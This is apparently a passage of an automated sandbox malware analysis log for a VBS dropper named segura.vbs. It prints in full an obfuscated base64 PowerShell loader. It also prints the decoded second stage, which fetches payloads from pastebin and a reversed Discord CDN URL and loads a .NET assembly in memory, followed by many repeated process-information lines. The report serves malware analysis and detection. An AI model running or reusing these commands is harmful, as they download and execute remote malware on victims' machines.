            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\segura.vbs');powershell $Yolopolhggobek;$global:?
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.rJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD342C2235 pushad ; iretd 4_2_00007FFD342C232D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD342C22A5 pushad ; iretd 4_2_00007FFD342C232D
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
